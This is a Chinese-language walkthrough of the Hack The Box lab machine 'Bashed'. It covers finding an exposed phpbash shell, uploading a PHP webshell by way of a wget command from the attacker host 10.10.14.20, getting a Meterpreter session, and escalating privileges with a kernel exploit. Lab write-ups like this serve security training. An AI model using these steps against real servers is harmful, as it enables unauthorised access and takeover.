【HTB】Bashed(可执行命令漏洞,内核提权)
2021-04-07 本文已影响0人
天线锅仔
信息收集

开了80端口,浏览器打开看看

一个叫phpbash的软件,网站找了一圈好像没有啥可以利用的东西。
目录爆破看看:

打开dev目录,发现两个文件

打开phpbash.php,发现是一个shell

攻击
因为可以执行任意shell,那就可以上传任意文件通过msf拿到meterpreter,生成一个木马,在本地开一个http服务,通过wget的方式从目标机器拉取本地的后门文件。
需要注意的是,不能直接拉取本地的php文件,必须在本地打包以后再拉取,我在这里就傻了,搞了半天。。。
另外,dev目录是没有写权限的,需要在uploads文件夹操作
最近知道msf里有一个中国菜刀的模块,于是决定用一下。
写一句话木马:

执行打包:
zip caidao.zip caidao.php
本地开启apache:
service apache2 start
在网页shell拉取
wget -P /var/www/html/uploads http://10.10.14.20/caidao.zip
解压:
unzip /var/www/html/uploads/caidao.zip -d /var/www/html/uploads/caidao

拿到meterpreter:

提权
查看系统版本

根据内核版本找了一圈,最后在这篇文章提到的方法里找到了一个提权脚本。
编译,上传,执行

拿到root权限和flag